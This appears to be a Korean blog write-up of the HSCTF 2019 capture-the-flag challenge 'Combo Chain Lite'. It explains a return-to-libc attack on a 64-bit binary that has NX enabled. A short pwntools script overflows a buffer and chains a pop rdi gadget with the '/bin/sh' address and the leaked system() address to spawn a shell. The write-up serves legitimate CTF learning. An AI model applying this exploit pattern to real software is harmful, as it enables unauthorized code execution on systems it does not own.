SDJ( 수돈재 아님 ㅎ )

HSCTF 2019 - Combo Chain Lite 본문

write-up/pwnable

HSCTF 2019 - Combo Chain Lite

ShinDongJun 2019. 9. 16. 21:46

64bit 바이너리에 NX만 활성화 되어있다.

 

 

Lite문제는 system의 주소를  주고 문자열 끝에 "/bin/sh"도 준다.

 

따라서 RTL로 쉘을 따면 되겠다.

 

64bit는 rdi, rsi, rdx순으로 인자를 받으므로 

pop_rdi 가젯을 찾아 /bin/sh를 넣고 system 함수를 호출하면 된다.

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
 
= process('./combo-chain-lite')
 
pop_rdi = 0x401273
 
p.recvuntil("computer: ")
libc_system = int(p.recvuntil('\n').strip(), 16)
print "libc_system : " + hex(libc_system)
 
bin_sh = 0x402028 + len("Dude you hear about that new game called ")
 
pay = ''
pay += 'a'*0x8
pay += 'bbbbbbbb'
pay += p64(pop_rdi)
pay += p64(bin_sh)
pay += p64(libc_system)
p.sendline(pay)
 
p.interactive()

 

'write-up > pwnable' 카테고리의 다른 글

NACTF 2019 - BufferOverflow #0  (0) 2019.09.23
HSCTF 2019 - Storytime  (0) 2019.09.16
HSCTF 2019 - Combo Chain  (0) 2019.09.16
HSCTF 2019 - Return to Sender  (0) 2019.09.16
DefCamp CTF Qualification 2019 - secret  (0) 2019.09.14
Comments